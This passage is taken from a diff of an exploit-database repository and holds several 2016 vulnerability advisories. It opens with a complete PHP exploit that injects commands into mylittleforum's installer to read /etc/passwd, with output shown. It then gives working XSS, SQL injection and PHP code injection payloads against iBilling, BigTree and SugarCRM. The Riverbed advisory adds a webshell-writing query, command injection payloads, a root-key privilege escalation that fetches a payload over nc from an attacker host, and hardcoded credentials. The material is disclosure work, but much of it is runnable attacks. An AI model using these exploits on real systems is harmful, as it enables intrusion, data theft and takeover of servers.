done!... we access /etc/passwd system file.
HTTP/1.1 200 OK
Date: Fri, 24 Jun 2016 03:01:13 GMT
Server: Apache/2.4.12 (Unix) OpenSSL/1.0.1m PHP/5.6.8 mod_perl/2.0.8-dev
Perl/v5.16.3
X-Powered-By: PHP/5.6.8
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
etc...
Exploit code(s):
===============
1) Download and unpack mylittleforum-2.3.5 upload to web server (Linux), chmod -R 777 etc...
2) Run below PHP script from Command line from remote work station
3) BOOM we can now read Linux "/etc/passwd" file on remote server
*/
<?php
#mylittleforum-2.3.5 PHP CMD Execution Exploit
#by hyp3rlinx
#ISR: apparitionsec
#hyp3rlinx.altervista.org
#cat Linux system file '/etc/passwd' POC
#tested RH Linux 5
#=======================================================
if($argc<5){
echo "myLittleForum CMS PHP Command Execution Exploit\r\n";
echo "Usage: <IP>,<MySQL-USER>,<MySQL-PASSWD>,<ROOT DIR>\r\n";
echo "================= by hyp3rlinx ===================\r\n";
exit();
}
$port=80; #Default port
$victim=$argv[1]; #IP
$user=$argv[2]; #MySQL username
$pwd=$argv[3]; #MySQL password
$root_dir=$argv[4]; #/mylittleforum-2.3.5
$uri="/install/index.php"; #PHP CMD inject entry point
$s = fsockopen($victim, $port, $errno, $errstr, 10);
if(!$s){echo "Cant connect to the server!"; exit();}
$CMD_INJECTTION="forum_name=PWN".
"&forum_address=http://$victim/$root_dir/".
"&forum_email=x@x.com".
"&admin_name=$user".
"&admin_email=x@x.com".
"&admin_pw=$pwd".
"&admin_pw_conf=$pwd".
"&host=localhost".
"&database=';?><?php echo passthru('/bin/cat /etc/passwd');'".
"&user=$user".
"&password=$pwd".
"&table_prefix=mlf2_".
"&install_submit=OK+-+Install+forum".
"&language_file=english.lang";
#Inject commands
$out = "POST /$root_dir/$uri HTTP/1.1\r\n";
$out .= "Host: $victim\r\n";
$out .= "Content-Type: application/x-www-form-urlencoded\r\n";
$out .= 'Content-Length: ' . strlen($CMD_INJECTTION) . "\r\n";
$out .= "Connection: close\r\n\r\n";
fwrite($s, $out);
fwrite($s, $CMD_INJECTTION);
fclose($s);
sleep(2);
#Second HTTP request to read Linux /etc/passwd file in the response
$out="";
$s = fsockopen($victim, $port, $errno, $errstr, 10);
$out = "GET /$root_dir/$uri HTTP/1.1\r\n";
$out .= "Host: $victim\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($s, $out);
$r='';
while (!feof($s)) {
$r=fgets($s, 128);
echo $r;
if(strpos($r,'<!DOCTYPE')!==FALSE){
break;
}
}
fclose($s);
?>
/*
Disclosure Timeline:
=================================
Vendor Notification: No Reply
June 27, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
===========================================
(High) 8.7
CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx
*/

57
platforms/php/webapps/40022.txt Executable file
View file

@ -0,0 +1,57 @@
iBilling v3.7.0 Multiple Stored and Reflected Cross Site Scripting Vulnerabilities
Vendor: iBilling
Product web page: http://www.ibilling.io/
Affected version: 3.7.0
Summary: The features you want, the simplicity you need! Beautifully
designed for best User Interface & User Experience. The software
That Works For YOUR Business! Get growing with affordable, scalable
business software. Find innovative ways to manage customers data,
communicate with customer, know your business cashflow, net worth,
send invoice to customer Hassle-free with single click payment reminder,
payment confirmations & get paid online integrated with payment gateways.
Desc: iBilling suffers from multiple cross-site scripting vulnerabilities.
The issue is triggered when input passed via multiple parameters is not
properly sanitized before being returned to the user. This can be exploited
to execute arbitrary HTML and script code in a user's browser session in
context of an affected site.
Tested on: nginx
PHP/5.5.9-1ubuntu4.6
Vulnerability discovered by Bikramaditya 'PhoenixX' Guha
@zeroscience
Advisory ID: ZSL-2016-5332
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5332.php
08.06.2016
1. Cross Site Scripting (Stored):
http://localhost/ibilling/index.php
Parameters: msg, desc, account, phone, company, address, city, state, zip, tags, description, ref (POST)
Payload(s):
account=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&company=%22%3E%3Cscript%3Ealert(2)%3C%2Fscript%3E&email=test%40yahoo.com&phone=%22%3E%3Cscript%3Ealert(4)%3C%2Fscript%3E&address=%22%3E%3Cscript%3Ealert(5)%3C%2Fscript%3E&city=%22%3E%3Cscript%3Ealert(6)%3C%2Fscript%3E&state=%22%3E%3Cscript%3Ealert(7)%3C%2Fscript%3E&zip=%22%3E%3Cscript%3Ealert(8)%3C%2Fscript%3E&country=TR&tags%5B%5D=web_development%22%3E%3Cscript%3Ealert(9)%3C%2Fscript%3E
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
2. Cross Site Scripting (Reflected):
http://localhost/ibilling/index.php
Parameters: cid (POST)
Payload(s):
cid=1001"><script>alert(1)</script>&msg=&icon=
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

181
platforms/php/webapps/40024.txt Executable file
View file

@ -0,0 +1,181 @@
1. ADVISORY INFORMATION
========================================
Title: BigTree CMS <= 4.2.11 Authenticated SQL Injection Vulnerability
Application: BigTree CMS
Remotely Exploitable: Yes
Versions Affected: < 4.2.11
Vendor URL: https://www.bigtreecms.org
Bugs: SQL Injection
Author: Mehmet Ince
Date of found: 27 Jun 2016
2. CREDIT
========================================
Those vulnerabilities was identified during external penetration test
by Mehmet INCE from PRODAFT / INVICTUS.
Netsparker was used for initial detection.
3. DETAILS
========================================
Following codes shows $page variable is used at inside SQL query without
proper escaping nor PDO.
File : /core/inc/bigtree/admin.php
Lines 6866 - 6879
function submitPageChange($page,$changes) {
if ($page[0] == "p") {
// It's still pending...
$type = "NEW";
$pending = true;
$existing_page = array();
$existing_pending_change = array("id" => substr($page,1));
} else {
// It's an existing page
$type = "EDIT";
$pending = false;
$existing_page = BigTreeCMS::getPage($page);
$existing_pending_change = sqlfetch(sqlquery("SELECT id FROM
bigtree_pending_changes WHERE `table` = 'bigtree_pages' AND item_id =
'$page'"));
}
...
}
Basically submitPageChange function is vulnerable against SQL Injection
vulnerability. This function was used twice during development. Following
list shows location of these function callers.
/core/admin/modules/pages/front-end-update.php
/core/admin/modules/pages/update.php
PoC:
Following HTTP POST request was used in order to exploit the SQL Injection
flaw.
POST /site/index.php/admin/pages/update/ HTTP/1.1
Cache-Control: no-cache
Referer: http://10.0.0.154/site/index.php/admin/pages/edit/2/
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/41.0.2272.16 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Cookie: PHPSESSID=amsscser3eg7fkljpjjt78ki17; hide_bigtree_bar=;
bigtree_admin[email]=mehmet%40mehmetince.net;
bigtree_admin[login]=%5B%22session-5770eca81c6d86.91986415%22%2C%22chain-5770ec71e2d7d3.28696204%22%5D;
PHPSESSID=lsrbe949jc3na5j1sof19a3s53
Host: 10.0.0.154
Accept-Encoding: gzip, deflate
Content-Length: 2248
Content-Type: multipart/form-data; boundary=b788b047b8e345b792cdc1f81fef2106
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="MAX_FILE_SIZE"
2097152
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="_bigtree_post_check"
success
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="page"
-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT
COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="nav_title"
The Trees
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="title"
The Trees
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="publish_at"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="expire_at"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="in_nav"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="redirect_lower"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="trunk"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="external"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="new_window"
Yes
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="resources[page_header]"
The Trees
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="tag_entry"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="route"
trees
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="seo_invisible"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="ptype"
Save
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="max_age"
3
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="template"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="meta_keywords"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="meta_description"
--b788b047b8e345b792cdc1f81fef2106--
4. TIMELINE
========================================
27 Jun 2016 - Netsparker identified SQL Injection.
27 Jun 2016 - Source code review and finding root cause of SQLi.
27 Jun 2016 - Issue resolved by PRODAFT / INVICTUS team.
27 Jun 2016 - Pull Request has been sended.
https://github.com/bigtreecms/BigTree-CMS/pull/256
--
Sr. Information Security Engineer
https://www.mehmetince.net

83
platforms/php/webapps/40027.txt Executable file
View file

@ -0,0 +1,83 @@
---------------------------------------------------------
SugarCRM <= 6.5.18 Two PHP Code Injection Vulnerabilities
---------------------------------------------------------
[-] Software Link:
http://www.sugarcrm.com/
[-] Affected Versions:
Version 6.5.18 CE and prior versions.
[-] Vulnerabilities Description:
1) The vulnerable code is located in the /include/utils/array_utils.php script:
99. function override_value_to_string_recursive2($array_name, $value_name, $value, $save_empty = true) {
100. if (is_array($value)) {
101. $str = '';
102. $newArrayName = $array_name . "['$value_name']";
103. foreach($value as $key=>$val) {
104. $str.= override_value_to_string_recursive2($newArrayName, $key, $val, $save_empty);
105. }
106. return $str;
107. } else {
108. if(!$save_empty && empty($value)){
109. return;
110. }else{
111. return "\$$array_name" . "['$value_name'] = " . var_export($value, true) . ";\n";
112. }
113. }
114. }
The "override_value_to_string_recursive2()" function is being used to save an array into a configuration file with a .php
extension. However, this function does not properly escape key names, and this can be exploited to inject and execute
arbitrary PHP code through e.g. the following URL, which will write arbitrary PHP code into the config_override.php file:
http://[host]/[sugar]/index.php?module=Connectors&action=RunTest&source_id=ext_rest_insideview&ext_rest_insideview_[%27.phpinfo().%27]=1
2) The vulnerable code is located in the /modules/UpgradeWizard/upload.php script:
117. $manifest_file = extractManifest($tempFile);
118.
119. if(is_file($manifest_file)) {
120. require_once( $manifest_file );
The vulnerability is caused by the Upgrade Wizard module, which allows to upload a package with an arbitrary manifest.php
file that will be executed by the application. This can be exploited by authenticated administrator users to upload and
execute arbitrary PHP code.
[-] Solution:
Update to version 6.5.19 CE or higher to mitigate the first vulnerability.
No official solution is currently available for the second vulnerability.
[-] Disclosure Timeline:
[29/10/2014] - Vendor notified
[15/12/2014] - Version 6.5.19 CE released: http://bit.do/sugar6519
[29/04/2015] - CVE number requested
[23/06/2016] - Public disclosure
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has not assigned a CVE identifier for these vulnerabilities.
[-] Credits:
Vulnerabilities discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2016-05

258
platforms/php/webapps/40028.txt Executable file
View file

@ -0,0 +1,258 @@
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Riverbed SteelCentral NetProfiler & NetExpress Multiple Vulnerabilities
Affected versions: SteelCentral NetProfiler <= 10.8.7 & SteelCentral
NetExpress <= 10.8.7
PDF:
http://www.security-assessment.com/files/documents/advisory/Riverbed-SteelCentral-NetProfilerNetExpress-Advisory.pdf
+-----------+
|Description|
+-----------+
The Riverbed SteelCentral NetProfiler and NetExpress virtual appliances,
which share the same code base, are affected by multiple security
vulnerabilities, including authentication bypass, SQL injection,
arbitrary code execution via command injection, privilege escalation,
local file inclusion, account hijacking and hardcoded default
credentials. Details for other low severity vulnerabilities (i.e.
cross-site scripting) are available in the accompanying PDF.
+------------+
|Exploitation|
+------------+
==SQL Injection==
The username POST parameter in the login method of the common REST API
is vulnerable to SQL injection via stacked queries. An attacker can
exploit this vulnerability to add a user account in the applications
PostgreSQL database and successfully bypass authentication. The
exploitation of this vulnerability can also be replicated from the main
web GUI login functionality as login calls are routed to the same common
REST API web service.
The proof-of-concept request below shows how to exploit the SQL
injection vulnerability to add a malicious user account into the users
table of the application database. Since quote characters can't be used
as part of the injection payload, an attacker needs to use string
concatenation to insert the field values (i.e. 'user' =>
CHR(117)||CHR(115)||CHR(101)||CHR(114)).
[POC SQL INJECTION - INSERT USER]
Method => POST
URL => /api/common/1.0/login
Content-type => application/json
Payload => {
"username": "test%';INSERT INTO users (username, password, uid) VALUES
(<user>, <SHA512 hash>, <random id>);--",
"password": ""
}
Additional SQL Injection vulnerabilities exist in the applications web
interface and can be exploited after authentication.
Method => GET
URL => /popup.php?page=export_report
Parameter => report_id
POC Payload => 1';SELECT PG_SLEEP(5)--
Method => GET
URL => /popup.php?page=algorithm_settings
Parameter => id
POC Payload => 1';SELECT PG_SLEEP(5)--
Method => POST
URL => /index.php?page=port_config
Parameter => PortsSelectControl/ports_config/port_names
POC Payload => ') AND 9625=(SELECT 9625 FROM PG_SLEEP(5)) AND
('Pdyu'='Pdyu
Method => POST
URL => /index.php?page=port_config
Parameter => PortsSelectControl/ports_config/port_numbers
POC Payload => 1-100) AND 5045=(SELECT 5045 FROM PG_SLEEP(5)) AND (2272=2272
Method => POST
URL => /index.php?page=port_config
Parameter => PortsSelectControl/ports_config/port_proto
POC Payload => ');SELECT PG_SLEEP(5)--
All the SQL injections above can be trivially exploited to write
malicious PHP code into a directory under the application web root
folder, such as one used for file uploads, and obtain arbitrary code
execution.
[POC SQL INJECTION - WRITE WEBSHELL]
GET
/popup.php?page=export_report&report_id=1';COPY+(SELECT+CHR(60)||CHR(63)||CHR(112)
||CHR(104)||CHR(112)||CHR(32)||CHR(101)||CHR(99)||CHR(104)||CHR(111)||CHR(32)||CHR(115)
||CHR(121)||CHR(115)||CHR(116)||CHR(101)||CHR(109)||CHR(40)||CHR(36)||CHR(95)||CHR(71)
||CHR(69)||CHR(84)||CHR(91)||CHR(34)||CHR(99)||CHR(109)||CHR(100)||CHR(34)||CHR(93)
||CHR(41)||CHR(59)||CHR(32)||CHR(63)||CHR(62))+TO+$$/usr/mazu/www/tmp/imports/shell.php$$;--
&export_type=3
==Command Injection==
Multiple command injection vulnerabilities exist in the appliances web
interfaces due to unsanitized user-supplied input passed as argument to
shell functions. An attacker can exploit these vulnerabilities to inject
shell commands and obtain arbitrary code execution.
URL => GET
/popup.php?page=test_connection&device=<PAYLOAD>&type=switch
Parameter => device
POC Payload => 1; touch /tmp/FILE;
URL => POST /index.php?page=licenses
Body => xjxfun=get_request_key&xjxr=<value>&xjxargs[]=<PAYLOAD>
Parameter => xjxargs[]
POC Payload => LICENSE-TOKEN; id;
Notes => Token Request functionality in 'Licenses' page
URL => GET /popup.php?page=packet_export&query=<PAYLOAD>
Parameter => query
POC Payload => 1; touch /tmp/MYFILE;
URL => POST /index.php?page=network_config
Body => <configuration params>&Setup/setup/network_hostname=<PAYLOAD>
Parameter => Setup/setup/network_hostname
POC Payload => 1; touch /tmp/MYFILE;
Notes => 'Configure now' functionality, injection occurs after
appliance reboots.
URL => POST /index.php?page=product_info
Body => xjxfun=delete_collect&&xjxr=<value>&xjxargs[]=<PAYLOAD>
Parameter => xjxargs[]
POC Payload => 1; touch /tmp/MYFILE;
Notes => 'Delete collected entry' functionality
==Privilege Escalation==
An insecure configuration of the /etc/sudoers file allows privilege
escalation to root. The apache user is allowed to run multiple scripts
under the /usr/mazu/bin directory without being prompted for a password,
including the following sudoers entry:
/usr/mazu/bin/mazu-run /usr/bin/sudo /bin/date*
The mazu-run script can be used to invoke the /bin/date binary in the
context of the built-in mazu user. An attacker can abuse the mazu-run
script to run the /bin/date binary with the f flag against a sensitive
file such as the root private SSH key. The f option instructs the
date binary to parse the file specified as a DATEFILE. By default, the
command date will echo back an error message with the contents of the
specified file when this does not comply with a valid DATEFILE format.
This technique can be exploited to get the root SSH private RSA key and
write it into the appliance filesystem using output redirection. An
attacker can then establish a SSH connection to the target system by
using the dumped private key to authenticate as root and spawn a root
reverse shell. The POC payload below shows how to exploit the vulnerability.
[POC PRIVILEGE ESCALATION]
sudo -u mazu /usr/mazu/bin/mazu-run /usr/bin/sudo /bin/date -f
/opt/cascade/vault/ssh/root/id_rsa | cut -d ' ' -f 4-
| tr -d '`' | tr -d "'" > /tmp/root_ssh_privatekey; chmod 600
/tmp/root_ssh_privatekey; ssh -o UserKnownHostsFile=/dev/null
-o StrictHostKeyChecking=no -i /tmp/root_ssh_privatekey root@localhost
'nc -n [attacker ip] 4444 > /tmp/shell.elf;
chmod 755 /tmp/shell.elf; /tmp/shell.elf';
==Local File Inclusion==
A local file inclusion vulnerability exists in the
sensor/ta_loader.php file due to a lack of input sanization for the
GET parameter class. This allows an attacker to read or include
arbitrary files.
As a practical exploitation scenario, an attacker can obtain arbitrary
code execution through the LFI vulnerability by first using the Edit
/etc/hosts functionality available under
/index.php?page=network_config to create a fake host entry (e.g.
'192.1.2.3 <?php echo system($_GET["cmd"]); ?>' ) and write malicious
PHP code on the appliance filesystem, then include the /etc/hosts file
and execute arbitrary shell commands.
[POC LFI]
curl https://<host>/sensor/ta_loader.php?cmd=<COMMAND>&class=/etc/hosts
==Account Hijacking==
The password change functionality under the
/index.php?page=security_compliance page is vulnerable to a logic bug
which allows account hijacking via arbitrary password reset. Although
the functionality prompts for the current account password before
allowing the user to set a new password, the hashed credentials of all
the system accounts on the SteelCentral NetProfiler and NetExpress
appliances are disclosed within the accountscredentialsid hidden
parameter in the page source code. The contents of the parameter are the
base64-encoded representation of a serialized PHP object containing the
credentials data.
This not only openly discloses the contents of the /etc/shadow file, but
can be also abused to carry out arbitrary password resets since the
current password verification is carried out on client-side against the
oldpassword field value within the serialized string. An attacker can
first generate a valid SHA-512 hash for an arbitrary current password
value along with computing the hash length. Then the password change
HTTP request can be intercepted to decode the base64-encoded serialized
object and modify the oldpassword hash value and its length for the
target system account to hijack with the generated SHA-512 hash of the
chosen current password value. The malicious string can now be base64
encoded back and used to replace the original request string.
After clicking the Configure Now button the application will validate
the current password value provided through the web interface against
the injected hash value, successfully setting the new password to the
arbitrary value chosen by the attacker.
==Hardcoded default credentials==
Multiple system accounts are configured on every deployment of the
SteelCentral NetProfiler and NetExpress virtual appliances with the same
hardcoded default credentials publicly available on the web.
Users => mazu, dhcp, root
Password => bb!nmp4y
The default mazu user sudo configuration allows the execution of all
shell commands as root without being prompted for a password. The user
'mazu' is the only privileged user account having remote SSH access to
the SteelCentral NetProfiler and NetExpress appliances (root SSH access
is restricted to localhost only). However, the application does not
enforce a password change for the built-in 'mazu' user during
configuration time or after the first login. These insecure settings can
be exploited as a remote backdoor to gain a privileged SSH shell to the
target system.
+----------+
| Solution |
+----------+
Upgrade Riverbed SteelCentral Netprofiler/NetExpress to version 10.9.0.
At the time of this writing, although the account hijacking
vulnerability has been resolved, the contents of the /etc/shadow file
are still disclosed in the hidden parameter originalsettingsid when
browsing to /index.php?page=security_compliance.
+------------+
| Timeline |
+------------+
24/03/2016 Initial disclosure to Riverbed.
25/03/2016 Vendor confirms receipt of advisory.
18/04/2016 Sent follow up email asking for a status update
19/04/2016 Vendor replies engineering team is working on software patches.
13/06/2016 Vendor releases patched software build.
27/06/2016 Public Disclosure
+------------+
| Additional |
+------------+
http://www.security-assessment.com/files/documents/advisory/Riverbed-SteelCentral-NetProfilerNetExpress-Advisory.pdf

View file

@ -0,0 +1,78 @@
# Exploit Title: Panda Security Privilege Escalation
# Date: 27/6/2016
# Exploit Author: Security-Assessment.com
# Vendor Homepage: http://www.pandasecurity.com
# Version: Panda Global Protection 2016 (16.1.2),Panda Antivirus Pro 2016 (16.1.2),Panda Small Business Protection (16.1.2),Panda Internet Security 2016 (16.1.2)
# Tested on: Windows 10
Panda Security Privilege Escalation
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Panda Security - Privilege Escalation
Affected Software -
Panda Global Protection 2016 (16.1.2)
Panda Antivirus Pro 2016 (16.1.2)
Panda Small Business Protection (16.1.2)
Panda Internet Security 2016 (16.1.2)
Testing Environment - Windows 10
PDF: http://www.security-assessment.com/files/documents/advisory/Panda%20Security%20-%20Privilege%20Escalation.pdf
+-------------+
| Description |
+-------------+
Multiple Panda Security products are vulnerable to local privilege escalation. As the USERS group has write permissions over the folder where the PSEvents.exe process is located, it is possible to execute malicious code as Local System.
+--------------+
| Exploitation |
+--------------+
“PSEvents.exe” is scheduled to be executed every hour with SYSTEM Privileges. When executed, it tries to locate a number of DLLs in its local directory to be loaded. However, some of these DLLs dont exist.
The DACLs of the directory that contains the “PSEvents.exe” executable allow a user in the USERS group to create files in that directory. A malicious user can exploit this vulnerability by creating a malicious DLL file in that directory and name it as one of the missing DLLs. After one hour, the “PSEvents.exe” process will start and load our malicious DLL
The same method can be used to exploit other executables (PSDevice.exe and PSProfiler.exe) located in Pandas Downloads directory.
+----------+
| Solution |
+----------+
Install Pandas Hotfix for this vulnerability.
http://www.pandasecurity.com/uk/support/card?id=100053
+----------+
| Timeline |
+----------+
10/5/2016 - Exchange PGP
11/5/2016 - Advisory sent to Panda Security
14/5/2016 - Confirm receipt of the advisory
23/5/2016 - Email Panda Security for update
01/6/2016 - Panda Security reply that they have a fix in development.
16/6/2016 - Panda Security send hotfix to verify if it fixes the vulnerability.
21/6/2016 - Panda Security schedule to release the hotfix on 24/6/2016
24/6/2016 - Hotfix released
27/6/2016 - Advisory released
+-------------------------------+
| About Security-Assessment.com |
+-------------------------------+
Security-Assessment.com is a leading team of Information Security consultants specialising in providing high quality Information Security services to clients throughout the Asia Pacific region. Our clients include some of the largest globally recognised companies in areas such as finance, telecommunications, broadcasting, legal and government. Our aim is to provide the very best independent advice and a high level of technical expertise while creating long and lasting professional relationships with our clients.
Security-Assessment.com is committed to security research and development, and its team continues to identify and responsibly publish vulnerabilities in public and private software vendor's products. Members of the Security-Assessment.com R&D team are globally recognised through their release of whitepapers and presentations related to new security research.
For further information on this issue or any of our service offerings, contact us:
Web www.security-assessment.com
Email info () security-assessment.com
Phone +64 4 470 1650